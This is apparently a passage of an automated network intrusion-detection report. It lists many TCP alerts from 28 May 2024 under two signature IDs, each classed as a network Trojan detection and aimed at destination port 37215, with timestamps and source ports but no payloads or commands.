            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782094
            SID:2829579
            Source Port:40846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887854
            SID:2835222
            Source Port:45666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862278
            SID:2829579
            Source Port:41106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033324
            SID:2835222
            Source Port:42086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854134
            SID:2829579
            Source Port:47034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814986
            SID:2829579
            Source Port:48228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999470
            SID:2829579
            Source Port:54634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.842341
            SID:2829579
            Source Port:50422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000207
            SID:2829579
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894262
            SID:2835222
            Source Port:46254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843491
            SID:2829579
            Source Port:46378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989733
            SID:2835222
            Source Port:36140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739641
            SID:2835222
            Source Port:34566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919105
            SID:2835222
            Source Port:49874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378696
            SID:2835222
            Source Port:50736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880183
            SID:2835222
            Source Port:35040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986101
            SID:2835222
            Source Port:56204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880632
            SID:2835222
            Source Port:48592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784178
            SID:2835222
            Source Port:48640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507078
            SID:2835222
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559286
            SID:2829579
            Source Port:57130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899829
            SID:2829579
            Source Port:51450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765918
            SID:2829579
            Source Port:34610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996024
            SID:2835222
            Source Port:49168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878792
            SID:2829579
            Source Port:36006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885489
            SID:2829579
            Source Port:53310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831608
            SID:2835222
            Source Port:35386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300145
            SID:2829579
            Source Port:49602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715012
            SID:2835222
            Source Port:55522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777665
            SID:2829579
            Source Port:49130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014849
            SID:2829579
            Source Port:47926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300150
            SID:2829579
            Source Port:37404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805626
            SID:2829579
            Source Port:41866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819734
            SID:2835222
            Source Port:51494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864615
            SID:2829579
            Source Port:36254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853456
            SID:2835222
            Source Port:34016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778182
            SID:2835222
            Source Port:59098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313108
            SID:2829579
            Source Port:55926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.384717
            SID:2835222
            Source Port:59040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670379
            SID:2835222
            Source Port:54604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543374
            SID:2835222
            Source Port:41990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754851
            SID:2835222
            Source Port:36980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041195
            SID:2835222
            Source Port:42874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872492
            SID:2829579
            Source Port:42148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912886
            SID:2829579
            Source Port:53194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.770544
            SID:2829579
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767685
            SID:2835222
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.462180
            SID:2835222
            Source Port:60440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728198
            SID:2835222
            Source Port:47356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943457
            SID:2829579
            Source Port:46250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445117
            SID:2829579
            Source Port:60130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818222
            SID:2835222
            Source Port:34788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326176
            SID:2829579
            Source Port:49532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610919
            SID:2835222
            Source Port:45264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764716
            SID:2835222
            Source Port:40834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544205
            SID:2829579
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050784
            SID:2829579
            Source Port:48414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128570
            SID:2829579
            Source Port:41960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944148
            SID:2829579
            Source Port:48216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873536
            SID:2829579
            Source Port:32808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378361
            SID:2835222
            Source Port:58312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808053
            SID:2829579
            Source Port:34248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943797
            SID:2835222
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.656003
            SID:2829579
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.194115
            SID:2835222
            Source Port:34504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610968
            SID:2835222
            Source Port:53190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899884
            SID:2835222
            Source Port:37050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862020
            SID:2829579
            Source Port:37676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910955
            SID:2835222
            Source Port:38796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.942773
            SID:2835222
            Source Port:41518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396995
            SID:2835222
            Source Port:57882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059742
            SID:2829579
            Source Port:41060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374950
            SID:2829579
            Source Port:40770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506209
            SID:2835222
            Source Port:55112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774788
            SID:2835222
            Source Port:51474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049238
            SID:2835222
            Source Port:42866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707668
            SID:2829579
            Source Port:51110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019310
            SID:2835222
            Source Port:48924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807523
            SID:2835222
            Source Port:36390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.952029
            SID:2829579
            Source Port:58362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067180
            SID:2835222
            Source Port:34422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.603990
            SID:2835222
            Source Port:35996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748372
            SID:2835222
            Source Port:45874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957110
            SID:2829579
            Source Port:43616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459815
            SID:2829579
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040311
            SID:2829579
            Source Port:45032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.397480
            SID:2835222
            Source Port:39778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.508166
            SID:2835222
            Source Port:39776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871202
            SID:2835222
            Source Port:32938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473477
            SID:2835222
            Source Port:45212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.643807
            SID:2835222
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948097
            SID:2835222
            Source Port:39696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064942
            SID:2835222
            Source Port:49004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507309
            SID:2829579
            Source Port:43692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559300
            SID:2835222
            Source Port:52440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827694
            SID:2835222
            Source Port:39630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753168
            SID:2829579
            Source Port:36086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317211
            SID:2829579
            Source Port:46694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706135
            SID:2835222
            Source Port:35756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043204
            SID:2835222
            Source Port:58952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291005
            SID:2835222
            Source Port:35246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626418
            SID:2835222
            Source Port:43592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507073
            SID:2829579
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605109
            SID:2835222
            Source Port:35726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.750450
            SID:2835222
            Source Port:35128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885262
            SID:2829579
            Source Port:36398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804425
            SID:2835222
            Source Port:55168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843726
            SID:2829579
            Source Port:55474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766904
            SID:2835222
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966617
            SID:2829579
            Source Port:50164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733280
            SID:2835222
            Source Port:49432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.667777
            SID:2829579
            Source Port:44056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485599
            SID:2835222
            Source Port:56984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904066
            SID:2829579
            Source Port:51198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507669
            SID:2829579
            Source Port:37084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706408
            SID:2835222
            Source Port:58548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995212
            SID:2835222
            Source Port:52222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596511
            SID:2829579
            Source Port:56522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954720
            SID:2835222
            Source Port:59030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010465
            SID:2835222
            Source Port:41166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995161
            SID:2829579
            Source Port:52156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811477
            SID:2829579
            Source Port:57760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896066
            SID:2829579
            Source Port:46990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486133
            SID:2835222
            Source Port:42544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590709
            SID:2829579
            Source Port:53282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158351
            SID:2835222
            Source Port:46472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696715
            SID:2829579
            Source Port:53576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027158
            SID:2835222
            Source Port:53700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319554
            SID:2829579
            Source Port:50698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872774
            SID:2835222
            Source Port:33686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746069
            SID:2829579
            Source Port:55220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777545
            SID:2835222
            Source Port:39126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868497
            SID:2829579
            Source Port:47406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736958
            SID:2829579
            Source Port:33340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944227
            SID:2829579
            Source Port:47456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058101
            SID:2829579
            Source Port:42528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425040
            SID:2829579
            Source Port:34238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453731
            SID:2829579
            Source Port:58656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676489
            SID:2829579
            Source Port:52642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616660
            SID:2835222
            Source Port:40886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969839
            SID:2835222
            Source Port:60036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508366
            SID:2829579
            Source Port:59164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.073282
            SID:2829579
            Source Port:44750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436614
            SID:2835222
            Source Port:48872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505885
            SID:2829579
            Source Port:59230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542001
            SID:2829579
            Source Port:47054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.782065
            SID:2835222
            Source Port:59714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739208
            SID:2835222
            Source Port:57564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.022344
            SID:2835222
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582032
            SID:2829579
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766584
            SID:2835222
            Source Port:53362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.309564
            SID:2829579
            Source Port:60474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057419
            SID:2829579
            Source Port:34144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.770894
            SID:2835222
            Source Port:60740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885116
            SID:2835222
            Source Port:48398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915231
            SID:2829579
            Source Port:49508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387360
            SID:2829579
            Source Port:43032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953572
            SID:2829579
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925610
            SID:2829579
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605360
            SID:2829579
            Source Port:53812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557283
            SID:2829579
            Source Port:41034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.949680
            SID:2829579
            Source Port:38960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942465
            SID:2829579
            Source Port:46378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932060
            SID:2835222
            Source Port:49946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043107
            SID:2829579
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993084
            SID:2835222
            Source Port:56142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748329
            SID:2829579
            Source Port:57096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569232
            SID:2829579
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051016
            SID:2835222
            Source Port:52390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.935107
            SID:2829579
            Source Port:33202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806590
            SID:2835222
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.012634
            SID:2829579
            Source Port:35508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605007
            SID:2835222
            Source Port:48338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620131
            SID:2829579
            Source Port:52820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825415
            SID:2829579
            Source Port:53752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388784
            SID:2829579
            Source Port:36950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809125
            SID:2835222
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343586
            SID:2829579
            Source Port:59378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358265
            SID:2835222
            Source Port:53042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817674
            SID:2829579
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771623
            SID:2829579
            Source Port:54530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.806409
            SID:2829579
            Source Port:33170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861779
            SID:2829579
            Source Port:54058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658113
            SID:2835222
            Source Port:47094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809317
            SID:2835222
            Source Port:56388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291058
            SID:2829579
            Source Port:59294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989097
            SID:2835222
            Source Port:60816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809380
            SID:2829579
            Source Port:50832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432147
            SID:2829579
            Source Port:45498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434552
            SID:2835222
            Source Port:48784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955996
            SID:2829579
            Source Port:53422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707831
            SID:2835222
            Source Port:38752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730549
            SID:2835222
            Source Port:54564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860620
            SID:2835222
            Source Port:57976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559917
            SID:2835222
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780117
            SID:2835222
            Source Port:36092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026607
            SID:2835222
            Source Port:60958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
